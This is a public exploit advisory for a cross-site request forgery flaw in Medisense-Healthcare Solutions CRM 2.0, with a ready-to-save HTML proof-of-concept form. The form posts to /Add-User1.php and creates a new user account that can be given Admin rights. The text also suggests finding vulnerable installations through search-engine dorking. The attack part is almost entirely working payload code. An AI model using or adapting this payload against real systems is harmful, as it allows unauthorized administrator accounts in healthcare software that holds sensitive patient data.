Medisense-Healthcare Solutions CRM 2.0 Cross Site Request Forgery

====================================================================================================================================| # Title     : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://medisensecrm.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] infected file : /Add-User1.php .[+] save code as poc.html .<h2>Add New User</h2>    <form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">    <h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>    <h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>    <h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>    <h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">    <input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>    <input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />  </div>  </form>    </div></div>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================